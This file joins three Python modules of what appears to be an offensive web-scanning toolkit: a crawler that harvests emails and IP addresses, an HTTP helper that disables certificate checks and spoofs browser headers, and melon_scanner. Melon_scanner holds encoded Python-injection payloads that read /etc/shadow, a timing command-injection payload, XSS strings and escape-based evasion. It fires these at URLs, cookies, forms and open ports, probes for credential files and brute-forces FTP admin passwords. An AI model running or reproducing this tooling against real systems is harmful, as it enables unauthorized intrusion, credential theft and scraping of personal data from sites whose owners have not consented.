import importlib
import io
import random
import re
import time
import urllib.parse
import TheSilent.kitten_crawler as kitten_crawler
import TheSilent.puppy_requests as puppy_requests
from TheSilent.clear import clear
from TheSilent.return_user_agent import return_user_agent

RED = "\033[1;31m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"

def pumpkin_scanner(init_host,delay=0,scripts=None):
    clear()
    hits = []
    file_list = [".doc",".docx",".gif",".ico",".jpeg",".jpg",".m4a",".mp3",".mp4",".pdf",".png"]
    host_list = kitten_crawler.kitten_crawler(init_host,delay)
    host_list = random.sample(host_list[:],len(host_list[:]))
    for host in host_list:
        time.sleep(delay)
        print(CYAN + f"scanning for interesting things on {host}")
        try:
            if scripts != None:
                data = puppy_requests.text(host,raw=True)
                for script in scripts:
                    if script == "faces":
                        init_script = importlib.import_module(script)
                        init_script.read(data,urllib.parse.urlparse(host).netloc + urllib.parse.urlparse(host).path.replace("/","<>"))

                    if script == "identify":
                        init_script = importlib.import_module(script)
                        result = init_script.read(data)
                        if result == "True":
                            with open(f"{urllib.parse.urlparse(init_host).netloc}_identify.txt","a") as file:
                                file.write(f"{host}: True\n")

                    if script == "ocr":
                        init_script = importlib.import_module(script)
                        img_data = init_script.read(io.BytesIO(data))
                        if len(img_data) > 0 and re.search("\w",img_data):
                            with open(f"{urllib.parse.urlparse(init_host).netloc}_ocr.txt","a") as file:
                                file.write(f"{host}: {img_data}\n")

            else:
                data = puppy_requests.text(host,raw=False)

            if scripts != None:
                emails = re.findall("[\w\.]{3,}@[\w\.]{3,}",data.decode(errors="ignore"))
                for email in emails:
                    hits.append(f"{email}: {host}")

                if re.search("type=[\"\']password[\"\']",data.decode(errors="ignore").lower()):
                    hits.append(f"password field: {host}")

                ip_addresses = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}",data.decode(errors="ignore"))
                for ip_address in ip_addresses:
                    hits.append(f"potential ip address- {ip_address}: {host}")

            else:
                emails = re.findall("[\w\.]{3,}@[\w\.]{3,}",data)
                for email in emails:
                    hits.append(f"{email}: {host}")

                if re.search("type\s{0,4}=\s{0,4}[\"\']password[\"\']",data.lower()):
                    hits.append(f"password field: {host}")

                ip_addresses = re.findall("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}",data)
                for ip_address in ip_addresses:
                    hits.append(f"potential ip address- {ip_address}: {host}")

        except:
            pass

        for _ in file_list:
            if _ in host:
                hits.append(f"potential interesting file: {host}")
                break

    hits = list(set(hits[:]))
    hits.sort()
    clear()
            
    if len(hits) > 0:
        with open(f"{urllib.parse.urlparse(init_host).netloc}.txt","a") as file:
            for hit in hits:
                file.write(hit + "\n")

        for hit in hits:
            print(GREEN + hit)



import http.client
import re
import socket
import ssl
import time
import urllib.parse
from TheSilent.return_user_agent import *

verify = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
verify.check_hostname = False
verify.verify_mode = ssl.CERT_NONE

RED = "\033[1;31m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"

fake_headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
                "Accept-Encoding":"deflate",
                "Accept-Language":"en-US,en;q=0.5",
                "Referer":"https://www.google.com/",
                "User-Agent":return_user_agent(),
                "UPGRADE-INSECURE-REQUESTS":"1"}

def getheaders(host,method="GET",params={},headers={},timeout=30):
    path = urllib.parse.urlparse(host).scheme + "://" + urllib.parse.urlparse(host).netloc
    path = host.replace(path, "")

    if host.startswith("https://"):
        my_request = http.client.HTTPSConnection(urllib.parse.urlparse(host).netloc,timeout=timeout,context=verify)

    else:
        my_request = http.client.HTTPConnection(urllib.parse.urlparse(host).netloc,timeout=timeout)

    if len(headers) > 0:
        if len(params) > 0:
            my_request.request(method=method,url=path,body=urllib.parse.urlencode(params),headers=headers)
            simple_respone = my_request.getresponse()
            return simple_respone.getheaders()

        else:
            my_request.request(method=method,url=path,headers=headers)
            simple_respone = my_request.getresponse()
            return simple_respone.getheaders()

    else:
        if len(params) > 0:
            my_request.request(method=method,url=path,body=urllib.parse.urlencode(params),headers=fake_headers)
            simple_respone = my_request.getresponse()
            return simple_respone.getheaders()

        else:
            my_request.request(method=method,url=path,headers=fake_headers)
            simple_respone = my_request.getresponse()
            return simple_respone.getheaders()

def history(host,method="GET",params={},headers={},timeout=30):
    path = urllib.parse.urlparse(host).scheme + "://" + urllib.parse.urlparse(host).netloc
    path = host.replace(path, "")

    host_list = [host]
    for _ in range(1000):
        redirect = status_code(host,method,params,headers,timeout)
        if redirect.startswith("30"):
            header = str(getheaders(host,method,params,headers,timeout)).replace("'", "").replace('"', "")
            host = re.findall("location,\s*(\S+)\)", header.lower())[0]
            host_list.append(host)

        if not redirect.startswith("30"):
            break

    return host_list

def status_code(host,method="GET",params={},headers={},timeout=30):
    path = urllib.parse.urlparse(host).scheme + "://" + urllib.parse.urlparse(host).netloc
    path = host.replace(path, "")

    if host.startswith("https://"):
        my_request = http.client.HTTPSConnection(urllib.parse.urlparse(host).netloc,timeout=timeout,context=verify)

    else:
        my_request = http.client.HTTPConnection(urllib.parse.urlparse(host).netloc,timeout=timeout)

    if len(headers) > 0:
        if len(params) > 0:
            my_request.request(method=method,url=path,body=urllib.parse.urlencode(params),headers=headers)
            simple_respone = my_request.getresponse()
            return str(simple_respone.status)

        else:
            my_request.request(method=method,url=path,headers=headers)
            simple_respone = my_request.getresponse()
            return str(simple_respone.status)

    else:
        if len(params) > 0:
            my_request.request(method=method,url=path,body=urllib.parse.urlencode(params),headers=fake_headers)
            simple_respone = my_request.getresponse()
            return str(simple_respone.status)

        else:
            my_request.request(method=method,url=path,headers=fake_headers)
            simple_respone = my_request.getresponse()
            return str(simple_respone.status)

def text(host,method="GET",params={},headers={},timeout=30,raw=False):
    path = urllib.parse.urlparse(host).scheme + "://" + urllib.parse.urlparse(host).netloc
    path = host.replace(path, "")
    
    for _ in range(1000):
        redirect = status_code(host,method,params,headers,timeout)
        if redirect.startswith("30"):
            header = str(getheaders(host,method,params,headers,timeout)).replace("'", "").replace('"', "")
            host = re.findall("location,\s*(\S+)\)", header.lower())[0]

        if not redirect.startswith("30"):
            break

    if host.startswith("https://"):
        my_request = http.client.HTTPSConnection(urllib.parse.urlparse(host).netloc,timeout=timeout,context=verify)

    else:
        my_request = http.client.HTTPConnection(urllib.parse.urlparse(host).netloc,timeout=timeout)

    if len(headers) > 0:
        if len(params) > 0:
            my_request.request(method=method,url=path,body=urllib.parse.urlencode(params),headers=headers)
            simple_respone = my_request.getresponse()
            if not raw:
                return simple_respone.read().decode(errors="ignore").replace("\r","")

            if raw:
                return simple_respone.read()

        else:
            my_request.request(method=method,url=path,headers=headers)
            simple_respone = my_request.getresponse()
            if not raw:
                return simple_respone.read().decode(errors="ignore").replace("\r","")

            if raw:
                return simple_respone.read()

    else:
        if len(params) > 0:
            my_request.request(method=method,url=path,body=urllib.parse.urlencode(params),headers=fake_headers)
            simple_respone = my_request.getresponse()
            if not raw:
                return simple_respone.read().decode(errors="ignore").replace("\r","")

            if raw:
                return simple_respone.read()

        else:
            my_request.request(method=method,url=path,headers=fake_headers)
            simple_respone = my_request.getresponse()
            if not raw:
                return simple_respone.read().decode(errors="ignore").replace("\r","")

            if raw:
                return simple_respone.read()



import io
import re
import time
import urllib.parse
import socket
import sys
from ftplib import FTP, FTP_TLS
from urllib.parse import *
import TheSilent.dolphin_scanner as dolphin_scanner
import TheSilent.kitten_crawler as kitten_crawler
import TheSilent.puppy_requests as puppy_requests
from TheSilent.clear import clear
from TheSilent.return_user_agent import return_user_agent

RED = "\033[1;31m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"

init_mal_command = ["ping -c 60 127.0.0.1"]

init_mal_dir = ["1.git",
                "1.php",
                "admin",
                "bin/bash",
                "admin",
                ".env",
                "etc/passwd",
                "etc/shadow",
                "global.asa",
                "login.php"]

init_mal_python = [r"eval(compile('import os\nos.system(\'cat /etc/shadow\')', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\nos.system(base64.b64decode(b\'Y2F0IC9ldGMvc2hhZG93\'))', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\nos.system(base64.b32decode(b\'MNQXIIBPMV2GGL3TNBQWI33X\'))', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\nos.system(base64.b16decode(b\'636174202F6574632F736861646F77\'))', 'melon', 'exec'))",
                   r"eval(compile('import os\ndef melon():\n    data = open(\'/etc/shadow\',\'r\')\n    data = data.read()\n    return data\nmelon()', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\ndef melon():\n    data = open(base64.b64decode(b\'L2V0Yy9zaGFkb3c=\'),\'r\')\n    data = data.read()\n    return data\nmelon()', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\ndef melon():\n    data = open(base64.b32decode(b\'F5SXIYZPONUGCZDPO4======\'),\'r\')\n    data = data.read()\n    return data\nmelon()', 'melon', 'exec'))",
                   r"eval(compile('import os, base64\ndef melon():\n    data = open(base64.b16decode(b\'2F6574632F736861646F77\'),\'r\')\n    data = data.read()\n    return data\nmelon()', 'melon', 'exec'))"]

init_mal_xss = ["<i>melon</i>",
                "<iframe>melon</iframe>",
                "<p>melon</p>",
                "<script>alert('melon')</script>",
                "<script>prompt('melon')</script>",
                "<strong>melon</strong>",
                "<title>melon</title>",]

mal_dir = init_mal_dir[:]
for mal in init_mal_dir:
    evade = ""
    for char in mal:
        evade += "\\" + char
    mal_dir.append(evade)

mal_command = init_mal_command[:]
for mal in mal_command:
    evade = ""
    for char in mal:
        evade += "\\" + char
    init_mal_command.append(evade)
for mal in init_mal_command:
    mal_command.append(io.BytesIO(mal.encode()))
    mal_command.append(io.BytesIO(mal.encode() + b" #.apk"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.bat"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.csv"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.gif"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.jpeg"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.jpg"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.log"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.m4a"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.mkv"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.mp3"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.mp4"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.pdf"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.png"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.ps1"))
    mal_command.append(io.BytesIO(mal.encode() + b" #.sh"))

mal_python = init_mal_python[:]
for mal in mal_python:
    evade = ""
    for char in mal:
        evade += "\\" + char
    init_mal_python.append(evade)
for mal in init_mal_python:
    mal_python.append(io.BytesIO(mal.encode()))
    mal_python.append(io.BytesIO(mal.encode() + b" #.apk"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.bat"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.csv"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.gif"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.jpeg"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.jpg"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.log"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.m4a"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.mkv"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.mp3"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.mp4"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.pdf"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.png"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.ps1"))
    mal_python.append(io.BytesIO(mal.encode() + b" #.sh"))

mal_xss = init_mal_xss[:]
for mal in mal_xss:
    evade = ""
    for char in mal:
        evade += "\\" + char
    init_mal_xss.append(evade)
for mal in init_mal_xss:
    mal_xss.append(io.BytesIO(mal.encode()))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.apk"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.bat"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.csv"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.gif"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.jpeg"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.jpg"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.log"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.m4a"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.mkv"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.mp3"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.mp4"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.pdf"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.png"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.ps1"))
    mal_xss.append(io.BytesIO(mal.encode() + b" #.sh"))

form_headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
                "Accept-Encoding":"deflate",
                "Accept-Language":"en-US,en;q=0.5",
                "Content-Type":"application/x-www-form-urlencoded",
                "User-Agent":return_user_agent(),
                "UPGRADE-INSECURE-REQUESTS":"1"}

def melon_scanner(init_host,delay=0):
    print(CYAN + "")
    clear()
    hits = []

    print(CYAN + f"enumerating {init_host}")
    host_list = kitten_crawler.kitten_crawler(init_host)
    for host in host_list:
        print(CYAN + f"scanning for interesting things on {host}")
        try:
            time.sleep(delay)
            data = puppy_requests.text(host)
            emails = re.findall("[\w\.]{3,}@[\w\.]{3,}",data)
            for email in emails:
                hits.append(email)

        except:
            pass

    ports = []
    banners = dolphin_scanner.dolphin_scanner(urllib.parse.urlparse(init_host).netloc,True)
    for banner in banners:
        hits.append(banner)
        ports.append(re.findall(":(\d+)-",banner)[0])

    print(CYAN + f"scanning ports for vulnerabilities on {urllib.parse.urlparse(init_host).netloc}")
    for port in ports:
        try:
            time.sleep(delay)
            my_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            my_socket.settimeout(10)
            my_socket.connect((urllib.parse.urlparse(init_host).netloc,port))
            for mal in mal_command:
                time.sleep(delay)
                my_socket.send(mal.encode())
                data = my_socket.recv(65536)
                if len(data) > 0:
                    hits.append(f"{urllib.parse.urlparse(init_host).netloc}:{port}- {data} ({mal})")

            for mal in mal_python:
                time.sleep(delay)
                my_socket.send(mal.encode())
                data = my_socket.recv(65536)
                if len(data) > 0:
                    hits.append(f"{urllib.parse.urlparse(init_host).netloc}:{port}- {data} ({mal})")

            my_socket.close()

        except:
            pass

    for host in host_list:
        print(CYAN + f"scanning for vulnerabilities on {host}")
        time.sleep(delay)
        # format host string
        if host.count("/") == 2:
            new_host = host + "/"

        else:
            new_host = host

        try:
            original_page = puppy_requests.text(host)
            all_forms = re.findall("<form[\S\s\n]+/form>", original_page)

        except:
            pass

        # check for directory traversal
        print(CYAN + "checking for directory traversal")
        all_dir = False
        try:
            data = puppy_requests.status_code(host + "/melon-scanner")
            if data == 200:
                all_dir = True

        except:
            pass

        if not all_dir:
            for mal in mal_dir:
                time.sleep(delay)
                try:
                    data = puppy_requests.status_code(new_host + mal)
                    if data == 200:
                        hits.append(f"found ({host}): {mal} page")

                except:
                    pass

        # check for command injection
        print(CYAN + "checking for command injection")
        for mal in mal_command:
            time.sleep(delay)
            try:
                start = time.time()
                data = puppy_requests.text(host + "/" + urllib.parse.quote_plus(mal),timeout=120)
                end = time.time()
                if end - start >= 55:
                    hits.append(f"command injection in url ({host}): {mal}")

            except:
                pass

            try:
                start = time.time()
                data = puppy_requests.text(host, params={mal:mal},timeout=120)
                end = time.time()
                if end - start >= 55:
                    hits.append(f"command injection in header ({host}): {mal}")

            except:
                pass

            try:
                start = time.time()
                data = puppy_requests.text(host, params={"Cookie":mal},timeout=120)
                end = time.time()
                if end - start >= 55:
                    hits.append(f"command injection in cookie ({host}): {mal}")

            except:
                pass

            try:
                start = time.time()
                data = puppy_requests.text(host, method=mal.upper(),timeout=120)
                end = time.time()
                if end - start >= 55:
                    hits.append(f"command injection in method ({host}): {mal}")

            except:
                pass

            try:
                if len(all_forms) > 0:
                    for form in all_forms:
                        time.sleep(delay)
                        action_bool = True
                        form_names = []
                        mal_value = []
                        form_method = re.findall("method\s?=\s?[\"\'](\S+)[\"\']", form)[0]
                        form_input = re.findall("<input.+>", form)
                        for field in form_input:
                            form_name = re.findall("name\s?=\s?[\"\'](\S+)[\"\']", field)[0]
                            form_type = re.findall("type\s?=\s?[\"\'](\S+)[\"\']", field)[0]
                            form_names.append(form_name)
                            if form_type.lower() == "button" or form_type.lower() == "hidden"  or form_type.lower() == "submit":
                                mal_value.append(re.findall("value\s?=\s?[\"\'](\S+)[\"\']", field)[0])

                            else:
                                mal_value.append(mal)

                        try:
                            action_tag = re.findall("action\s?=\s?[\"\'](\S+)[\"\']", form)[0]
                            if action_tag.startswith("https://") or action_tag.startswith("http://"):
                                action = action_tag

                            if action_tag.startswith("/"):
                                action = host + action_tag

                            else:
                                action = urllib.parse.urlparse(host).scheme + "://" + urllib.parse.urlparse(host).netloc + "/" + action_tag

                        except IndexError:
                            action_bool = False

                        if action_bool:
                            start = time.time()
                            data = puppy_requests.text(action,method=form_method.upper(),params=dict(zip(form_names,mal_value)),headers=form_headers,timeout=120)
                            end = time.time()
                            if end - start >= 55:
                                hits.append(f"command injection in forms ({action}): {dict(zip(form_names,mal_value))}")

                        else:
                            start = time.time()
                            data = puppy_requests.text(host,method=form_method.upper(),params=dict(zip(form_names,mal_value)),headers=form_headers,timeout=120)
                            end = time.time()
                            if end - start >= 55:
                                hits.append(f"command injection in forms ({host})- {dict(zip(form_names,mal_value))}")

            except:
                pass

        # check for python injection
        print(CYAN + "checking for python injection")
        for mal in mal_python:
            time.sleep(delay)
            try:
                data = puppy_requests.text(host + "/" + urllib.parse.quote_plus(mal))
                if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                    hits.append(f"python injection in url ({host}): {mal}")

            except:
                pass

            try:
                data = puppy_requests.text(host, params={mal:mal})
                if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                    hits.append(f"python injection in header ({host}): {mal}")

            except:
                pass

            try:
                data = puppy_requests.text(host, params={"Cookie":mal})
                if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                    hits.append(f"python injection in cookie ({host}): {mal}")

            except:
                pass

            try:
                data = puppy_requests.text(host, method=mal.upper())
                if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                    hits.append(f"python injection in method ({host}): {mal}")

            except:
                pass

            try:
                if len(all_forms) > 0:
                    for form in all_forms:
                        time.sleep(delay)
                        action_bool = True
                        form_names = []
                        mal_value = []
                        form_method = re.findall("method\s?=\s?[\"\'](\S+)[\"\']", form)[0]
                        form_input = re.findall("<input.+>", form)
                        for field in form_input:
                            form_name = re.findall("name\s?=\s?[\"\'](\S+)[\"\']", field)[0]
                            form_type = re.findall("type\s?=\s?[\"\'](\S+)[\"\']", field)[0]
                            form_names.append(form_name)
                            if form_type.lower() == "button" or form_type.lower() == "hidden"  or form_type.lower() == "submit":
                                mal_value.append(re.findall("value\s?=\s?[\"\'](\S+)[\"\']", field)[0])

                            else:
                                mal_value.append(mal)

                        try:
                            action_tag = re.findall("action\s?=\s?[\"\'](\S+)[\"\']", form)[0]
                            if action_tag.startswith("https://") or action_tag.startswith("http://"):
                                action = action_tag

                            if action_tag.startswith("/"):
                                action = host + action_tag

                            else:
                                action = urllib.parse.urlparse(host).scheme + "://" + urllib.parse.urlparse(host).netloc + "/" + action_tag

                        except IndexError:
                            action_bool = False

                        if action_bool:
                            data = puppy_requests.text(action,method=form_method.upper(),params=dict(zip(form_names,mal_value)),headers=form_headers)
                            if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                                hits.append(f"python injection in forms ({action}): {dict(zip(form_names,mal_value))}")

                        else:
                            data = puppy_requests.text(host,method=form_method.upper(),params=dict(zip(form_names,mal_value)),headers=form_headers)
                            if "root:" in data.lower() and "daemon:" in data.lower() and "bin:" in data.lower() and "sys:" in data.lower():
                                hits.append(f"python injection in forms ({host})- {dict(zip(form_names,mal_value))}")

            except:
                pass

        # check for xss
        print(CYAN + "checking for xss")
        for mal in mal_xss:
            time.sleep(delay)
            try:
                data = puppy_requests.text(host + "/" + urllib.parse.quote_plus(mal))
                if mal in data:
                    hits.append(f"xss in url ({host}): {mal}")

            except:
                pass

            try:
                data = puppy_requests.text(host, params={mal:mal})
                if mal in data:
                    hits.append(f"xss in header ({host}): {mal}")

            except:
                pass

            try:
                data = puppy_requests.text(host, params={"Cookie":mal})
                if mal in data:
                    hits.append(f"xss in cookie ({host}): {mal}")

            except:
                pass

            try:
                data = puppy_requests.text(host, method=mal.upper())
                if mal in data:
                    hits.append(f"xss in method ({host}): {mal}")

            except:
                pass

            try:
                if len(all_forms) > 0:
                    for form in all_forms:
                        time.sleep(delay)
                        action_bool = True
                        form_names = []
                        mal_value = []
                        form_method = re.findall("method\s?=\s?[\"\'](\S+)[\"\']", form)[0]
                        form_input = re.findall("<input.+>", form)
                        for field in form_input:
                            form_name = re.findall("name\s?=\s?[\"\'](\S+)[\"\']", field)[0]
                            form_type = re.findall("type\s?=\s?[\"\'](\S+)[\"\']", field)[0]
                            form_names.append(form_name)
                            if form_type.lower() == "button" or form_type.lower() == "hidden"  or form_type.lower() == "submit":
                                mal_value.append(re.findall("value\s?=\s?[\"\'](\S+)[\"\']", field)[0])

                            else:
                                mal_value.append(mal)

                        try:
                            action_tag = re.findall("action\s?=\s?[\"\'](\S+)[\"\']", form)[0]
                            if action_tag.startswith("https://") or action_tag.startswith("http://"):
                                action = action_tag

                            if action_tag.startswith("/"):
                                action = host + action_tag

                            else:
                                action = urllib.parse.urlparse(host).scheme + "://" + urllib.parse.urlparse(host).netloc + "/" + action_tag

                        except IndexError:
                            action_bool = False

                        if action_bool:
                            data = puppy_requests.text(action,method=form_method.upper(),params=dict(zip(form_names,mal_value)),headers=form_headers)
                            if mal in data:
                                hits.append(f"xss in forms ({action}): {dict(zip(form_names,mal_value))}")

                        else:
                            data = puppy_requests.text(host,method=form_method.upper(),params=dict(zip(form_names,mal_value)),headers=form_headers)
                            if mal in data:
                                hits.append(f"xss in forms ({host})- {dict(zip(form_names,mal_value))}")

            except:
                pass

        # check for anonymous ftp binding
        print(CYAN + "checking ftp")
        ftp_host = host.replace("https://", "")
        ftp_host = ftp_host.replace("http", "")
        ftp_host = ftp_host.replace("/", "")

        try:
            time.sleep(delay)
            ftp = FTP(ftp_host, timeout=5)
            ftp.login()
            ftp.quit()
            hits.append(f"anonymous ftp login allowed ({host})")

        except:
            pass

        try:
            time.sleep(delay)
            ftp = FTP_TLS(ftp_host, timeout=5)
            ftp.login()
            ftp.quit()
            hits.append(f"anonymous secure ftp login allowed ({host})")

        except:
            pass

        # check for weak ftp credentials
        password_list = ["","admin","password","1234","0000","123456","12345678","000000","00000000"]
        for password in password_list:
            time.sleep(delay)
            try:
                ftp = FTP(ftp_host, timeout=5)
                ftp.login("admin",password)
                ftp.quit()
                hits.append(f"ftp weak credentials allowed- admin:{password} ({host})")
                break

            except:
                continue

        for password in password_list:
            time.sleep(delay)
            try:
                ftp = FTP_TLS(ftp_host, timeout=5)
                ftp.login("admin",password)
                ftp.quit()
                hits.append(f"secure ftp weak credentials allowed- admin:{password} ({host})")
                break

            except:
                continue

    hits = list(set(hits[:]))
    hits.sort()
    clear()
    if len(hits) > 0:
        for hit in hits:
            print(RED + hit)

    else:
        print(GREEN + "we didn't find anything interesting")
